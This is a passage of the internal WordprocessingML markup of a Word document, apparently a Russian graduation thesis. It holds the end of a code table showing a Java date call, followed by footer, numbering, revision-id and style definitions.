              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>getInstance</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>().getTime();</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00355B45" w:rsidRPr="00355B45" w:rsidRDefault="00355B45" w:rsidP="00A01E47">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00355B45" w:rsidRPr="00355B45" w:rsidSect="009453D3">
      <w:footerReference w:type="default" r:id="rId39"/>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789" w:rsidRDefault="00B23789" w:rsidP="002C1072">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B23789" w:rsidRDefault="00B23789"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77328"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF">
        <w:pPr>
          <w:pStyle w:val="af8"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A63AD6">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF">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789" w:rsidRDefault="00B23789" w:rsidP="002C1072">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B23789" w:rsidRDefault="00B23789"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2C1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4610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DC5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363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E090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B213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4ED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2E0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66B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9065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2B9E7B0A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="89DAEE2C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="10"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1556" w:hanging="705"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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4"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6"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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4ECD53B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5C6CBEE"/>
    <w:lvl w:ilvl="0" w:tplc="BC1AA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DDE5ADB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D430D022"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="11"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1556" w:hanging="705"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="2"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="127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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5F2F5E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DD1962"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04190025"/>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0"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="19"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="19"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="19"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="12"/>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4"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="1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6"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="19"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="13"/>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07DA5"/>
    <w:rsid w:val="00015144"/>
    <w:rsid w:val="00032DE6"/>
    <w:rsid w:val="00035A28"/>
    <w:rsid w:val="00042E55"/>
    <w:rsid w:val="0004794C"/>
    <w:rsid w:val="00050085"/>
    <w:rsid w:val="00064AB5"/>
    <w:rsid w:val="00070A6D"/>
    <w:rsid w:val="00077414"/>
    <w:rsid w:val="000853C0"/>
    <w:rsid w:val="00085896"/>
    <w:rsid w:val="00087A38"/>
    <w:rsid w:val="00093CD4"/>
    <w:rsid w:val="00096345"/>
    <w:rsid w:val="000C0933"/>
    <w:rsid w:val="000C4FD7"/>
    <w:rsid w:val="000D51AE"/>
    <w:rsid w:val="000D5530"/>
    <w:rsid w:val="000D67D3"/>
    <w:rsid w:val="000F53E5"/>
    <w:rsid w:val="000F60D4"/>
    <w:rsid w:val="00112793"/>
    <w:rsid w:val="00116DFC"/>
    <w:rsid w:val="00124ABE"/>
    <w:rsid w:val="00124D2E"/>
    <w:rsid w:val="001354A0"/>
    <w:rsid w:val="00135EB8"/>
    <w:rsid w:val="00151270"/>
    <w:rsid w:val="0016468A"/>
    <w:rsid w:val="001704CA"/>
    <w:rsid w:val="001773B0"/>
    <w:rsid w:val="0018232B"/>
    <w:rsid w:val="0018539E"/>
    <w:rsid w:val="00186CA9"/>
    <w:rsid w:val="001929D2"/>
    <w:rsid w:val="001930E7"/>
    <w:rsid w:val="0019393C"/>
    <w:rsid w:val="0019431F"/>
    <w:rsid w:val="001E447A"/>
    <w:rsid w:val="001E4D1C"/>
    <w:rsid w:val="001E572E"/>
    <w:rsid w:val="001E785D"/>
    <w:rsid w:val="00206016"/>
    <w:rsid w:val="00224959"/>
    <w:rsid w:val="00230CD6"/>
    <w:rsid w:val="00234CE1"/>
    <w:rsid w:val="0027056C"/>
    <w:rsid w:val="002925D2"/>
    <w:rsid w:val="002938E3"/>
    <w:rsid w:val="00294D47"/>
    <w:rsid w:val="002A41A0"/>
    <w:rsid w:val="002A6F86"/>
    <w:rsid w:val="002B4F1F"/>
    <w:rsid w:val="002B6996"/>
    <w:rsid w:val="002B77C4"/>
    <w:rsid w:val="002C1072"/>
    <w:rsid w:val="002D59E5"/>
    <w:rsid w:val="002E3820"/>
    <w:rsid w:val="002F08C9"/>
    <w:rsid w:val="003014E5"/>
    <w:rsid w:val="0031383A"/>
    <w:rsid w:val="00343966"/>
    <w:rsid w:val="00345486"/>
    <w:rsid w:val="00345DD4"/>
    <w:rsid w:val="00353F93"/>
    <w:rsid w:val="00354ED1"/>
    <w:rsid w:val="00355B45"/>
    <w:rsid w:val="00375C80"/>
    <w:rsid w:val="003830E4"/>
    <w:rsid w:val="003843B4"/>
    <w:rsid w:val="003868BF"/>
    <w:rsid w:val="003D3BD0"/>
    <w:rsid w:val="003D44FB"/>
    <w:rsid w:val="003F021A"/>
    <w:rsid w:val="003F046F"/>
    <w:rsid w:val="003F1F10"/>
    <w:rsid w:val="00415F9B"/>
    <w:rsid w:val="004240A9"/>
    <w:rsid w:val="00427518"/>
    <w:rsid w:val="00452CC4"/>
    <w:rsid w:val="004674FA"/>
    <w:rsid w:val="00487703"/>
    <w:rsid w:val="004926CC"/>
    <w:rsid w:val="00496919"/>
    <w:rsid w:val="00497D3B"/>
    <w:rsid w:val="004A5FE1"/>
    <w:rsid w:val="004B218D"/>
    <w:rsid w:val="004B57AF"/>
    <w:rsid w:val="004D2B52"/>
    <w:rsid w:val="005038B5"/>
    <w:rsid w:val="00505B5C"/>
    <w:rsid w:val="005067CE"/>
    <w:rsid w:val="00521070"/>
    <w:rsid w:val="00531F4B"/>
    <w:rsid w:val="00535073"/>
    <w:rsid w:val="00537692"/>
    <w:rsid w:val="0054048E"/>
    <w:rsid w:val="00540839"/>
    <w:rsid w:val="00547371"/>
    <w:rsid w:val="00583156"/>
    <w:rsid w:val="005B4796"/>
    <w:rsid w:val="005D116C"/>
    <w:rsid w:val="005E2AFD"/>
    <w:rsid w:val="005E3220"/>
    <w:rsid w:val="005E7E20"/>
    <w:rsid w:val="00610D8C"/>
    <w:rsid w:val="006140CC"/>
    <w:rsid w:val="00630662"/>
    <w:rsid w:val="006524A2"/>
    <w:rsid w:val="006657C4"/>
    <w:rsid w:val="00677E44"/>
    <w:rsid w:val="006836BD"/>
    <w:rsid w:val="00687DF7"/>
    <w:rsid w:val="00694A4F"/>
    <w:rsid w:val="006B6728"/>
    <w:rsid w:val="006D6C72"/>
    <w:rsid w:val="006E1540"/>
    <w:rsid w:val="006E6EFB"/>
    <w:rsid w:val="006F26F0"/>
    <w:rsid w:val="00712B2B"/>
    <w:rsid w:val="00713EA3"/>
    <w:rsid w:val="007329BB"/>
    <w:rsid w:val="007343EE"/>
    <w:rsid w:val="00743D65"/>
    <w:rsid w:val="00751156"/>
    <w:rsid w:val="00753BE3"/>
    <w:rsid w:val="00762CAC"/>
    <w:rsid w:val="007637B5"/>
    <w:rsid w:val="00766209"/>
    <w:rsid w:val="0077073D"/>
    <w:rsid w:val="0078129C"/>
    <w:rsid w:val="007C15AF"/>
    <w:rsid w:val="007C1D21"/>
    <w:rsid w:val="007F0C6F"/>
    <w:rsid w:val="007F74EE"/>
    <w:rsid w:val="00822323"/>
    <w:rsid w:val="0083523C"/>
    <w:rsid w:val="008365C2"/>
    <w:rsid w:val="0084517D"/>
    <w:rsid w:val="00847C79"/>
    <w:rsid w:val="008638DD"/>
    <w:rsid w:val="00880109"/>
    <w:rsid w:val="00893F67"/>
    <w:rsid w:val="008B2148"/>
    <w:rsid w:val="008B735D"/>
    <w:rsid w:val="008D778B"/>
    <w:rsid w:val="009000AC"/>
    <w:rsid w:val="00923ABA"/>
    <w:rsid w:val="00925558"/>
    <w:rsid w:val="00930262"/>
    <w:rsid w:val="009453D3"/>
    <w:rsid w:val="00961B7B"/>
    <w:rsid w:val="00962B68"/>
    <w:rsid w:val="00964F7E"/>
    <w:rsid w:val="00976B16"/>
    <w:rsid w:val="00977D58"/>
    <w:rsid w:val="00984403"/>
    <w:rsid w:val="00990622"/>
    <w:rsid w:val="009915DA"/>
    <w:rsid w:val="009B1CDA"/>
    <w:rsid w:val="009C6151"/>
    <w:rsid w:val="009D1D99"/>
    <w:rsid w:val="009D23BC"/>
    <w:rsid w:val="009D41FE"/>
    <w:rsid w:val="00A012F4"/>
    <w:rsid w:val="00A01A70"/>
    <w:rsid w:val="00A01E47"/>
    <w:rsid w:val="00A22B75"/>
    <w:rsid w:val="00A311F6"/>
    <w:rsid w:val="00A34A55"/>
    <w:rsid w:val="00A451E5"/>
    <w:rsid w:val="00A559AC"/>
    <w:rsid w:val="00A63AD6"/>
    <w:rsid w:val="00A64581"/>
    <w:rsid w:val="00A66119"/>
    <w:rsid w:val="00A95645"/>
    <w:rsid w:val="00A97EB2"/>
    <w:rsid w:val="00AD46FA"/>
    <w:rsid w:val="00AE3722"/>
    <w:rsid w:val="00AF064D"/>
    <w:rsid w:val="00AF32A4"/>
    <w:rsid w:val="00B03B72"/>
    <w:rsid w:val="00B05C12"/>
    <w:rsid w:val="00B10435"/>
    <w:rsid w:val="00B10E7D"/>
    <w:rsid w:val="00B23789"/>
    <w:rsid w:val="00B33563"/>
    <w:rsid w:val="00B374C3"/>
    <w:rsid w:val="00B44000"/>
    <w:rsid w:val="00B5656D"/>
    <w:rsid w:val="00B66597"/>
    <w:rsid w:val="00B8529C"/>
    <w:rsid w:val="00B934D3"/>
    <w:rsid w:val="00B95234"/>
    <w:rsid w:val="00BD456F"/>
    <w:rsid w:val="00BF03B6"/>
    <w:rsid w:val="00C01E37"/>
    <w:rsid w:val="00C02A9B"/>
    <w:rsid w:val="00C02ECB"/>
    <w:rsid w:val="00C07405"/>
    <w:rsid w:val="00C118F3"/>
    <w:rsid w:val="00C17BE1"/>
    <w:rsid w:val="00C2046C"/>
    <w:rsid w:val="00C23E72"/>
    <w:rsid w:val="00C3007B"/>
    <w:rsid w:val="00C64873"/>
    <w:rsid w:val="00C84DC3"/>
    <w:rsid w:val="00C90951"/>
    <w:rsid w:val="00C90CDC"/>
    <w:rsid w:val="00C94B05"/>
    <w:rsid w:val="00CD7F94"/>
    <w:rsid w:val="00CE1DF6"/>
    <w:rsid w:val="00CF733B"/>
    <w:rsid w:val="00D05E11"/>
    <w:rsid w:val="00D20757"/>
    <w:rsid w:val="00D21884"/>
    <w:rsid w:val="00D47B17"/>
    <w:rsid w:val="00D5657B"/>
    <w:rsid w:val="00D600A4"/>
    <w:rsid w:val="00D6194F"/>
    <w:rsid w:val="00D6635B"/>
    <w:rsid w:val="00D84EC4"/>
    <w:rsid w:val="00DA6C27"/>
    <w:rsid w:val="00DB60A5"/>
    <w:rsid w:val="00DC4AB9"/>
    <w:rsid w:val="00DD4C25"/>
    <w:rsid w:val="00DD4FDA"/>
    <w:rsid w:val="00DE45F9"/>
    <w:rsid w:val="00DE569F"/>
    <w:rsid w:val="00DE6727"/>
    <w:rsid w:val="00DF2615"/>
    <w:rsid w:val="00DF2AB7"/>
    <w:rsid w:val="00DF6765"/>
    <w:rsid w:val="00E10E50"/>
    <w:rsid w:val="00E11CE6"/>
    <w:rsid w:val="00E271BB"/>
    <w:rsid w:val="00E3473C"/>
    <w:rsid w:val="00E369AE"/>
    <w:rsid w:val="00E37904"/>
    <w:rsid w:val="00E70973"/>
    <w:rsid w:val="00E812BA"/>
    <w:rsid w:val="00E9217A"/>
    <w:rsid w:val="00EC4887"/>
    <w:rsid w:val="00F054DE"/>
    <w:rsid w:val="00F07BA9"/>
    <w:rsid w:val="00F11D21"/>
    <w:rsid w:val="00F15BD6"/>
    <w:rsid w:val="00F20404"/>
    <w:rsid w:val="00F30DBF"/>
    <w:rsid w:val="00F36882"/>
    <w:rsid w:val="00F37007"/>
    <w:rsid w:val="00F52E3B"/>
    <w:rsid w:val="00F5445F"/>
    <w:rsid w:val="00F61808"/>
    <w:rsid w:val="00F61C61"/>
    <w:rsid w:val="00F622DF"/>
    <w:rsid w:val="00F66289"/>
    <w:rsid w:val="00F750A6"/>
    <w:rsid w:val="00F8237A"/>
    <w:rsid w:val="00F870DF"/>
    <w:rsid w:val="00FB15D4"/>
    <w:rsid w:val="00FB3021"/>
    <w:rsid w:val="00FD3BFB"/>
    <w:rsid w:val="00FE014B"/>
    <w:rsid w:val="00FE7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7CA1A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7201712F-5B73-4278-B445-EA6C4C35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DC4AB9"/>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0">
    <w:name w:val="heading 2"/>
    <w:aliases w:val="Подзаголовок 1"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="21"/>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0">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:link w:val="31"/>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1">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:aliases w:val="Подзаголовок 1 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A451E5"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="1 Заголовок"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="2"/>
    <w:link w:val="13"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00687DF7"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:spacing w:after="240"/>
      <w:ind w:left="0" w:firstLine="709"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="110">
    <w:name w:val="1.1 Заголовок"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="111"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E70973"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="1 Заголовок Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00687DF7"/>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1">
    <w:name w:val="1.1 Заголовок Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="110"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00E7097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0">
    <w:name w:val="1.1.1 Заголовок"/>
    <w:basedOn w:val="14"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002938E3"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="31">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="30"/>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 w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB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DB60A5"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afc">
    <w:name w:val="Таблица"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="afd"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E70973"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afe">
    <w:name w:val="ЗагСтЕд"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="aff"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E70973"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afd">
    <w:name w:val="Таблица Знак"/>
    <w:basedOn w:val="140"/>
    <w:link w:val="afc"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00E70973"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заг1"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="16"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00687DF7"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="26"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff">
    <w:name w:val="ЗагСтЕд Знак"/>
    <w:basedOn w:val="13"/>
    <w:link w:val="afe"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00E70973"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="2">
    <w:name w:val="Заг2"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="22"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00FE7F61"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:left="0" w:firstLine="709"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="Заг1 Знак"/>
    <w:basedOn w:val="13"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00687DF7"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3">
    <w:name w:val="Заг3"/>
    <w:basedOn w:val="2"/>
    <w:link w:val="32"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00FE7F61"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="709"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="Заг2 Знак"/>
    <w:basedOn w:val="16"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00F054DE"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="23">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FE7F61"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="280"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32">
    <w:name w:val="Заг3 Знак"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00FE7F61"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="33">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a1"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FE7F61"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="560"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff0">
    <w:name w:val="ТаблИмя"/>
    <w:basedOn w:val="ac"/>
    <w:link w:val="aff1"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00D6635B"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff2">
    <w:name w:val="ТаблСод"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="aff3"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00DF6765"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff1">
    <w:name w:val="ТаблИмя Знак"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="aff0"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00D6635B"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Tahoma"/>
      <w:iCs/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff4">
    <w:name w:val="РисИмя"/>
    <w:basedOn w:val="ac"/>
    <w:link w:val="aff5"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00124ABE"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff3">
    <w:name w:val="ТаблСод Знак"/>
    <w:basedOn w:val="aff1"/>
    <w:link w:val="aff2"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00DF6765"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Tahoma"/>
      <w:iCs w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff5">
    <w:name w:val="РисИмя Знак"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="aff4"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00124ABE"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Tahoma"/>
      <w:iCs/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-0">
    <w:name w:val="ВКР Глава-Раздел"/>
    <w:basedOn w:val="a5"/>
    <w:next w:val="a1"/>
    <w:link w:val="-1"/>
    <w:qFormat/>
    <w:rsid w:val="00F870DF"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:spacing w:before="0" w:after="720" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="567" w:right="567"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:caps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="-1">
    <w:name w:val="ВКР Глава-Раздел Знак"/>
    <w:basedOn w:val="a6"/>
    <w:link w:val="-0"/>
    <w:rsid w:val="00F870DF"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:caps/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff6">
    <w:name w:val="ВКР Обычный"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aff7"/>
    <w:qFormat/>
    <w:rsid w:val="00F870DF"/>
    <w:pPr>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
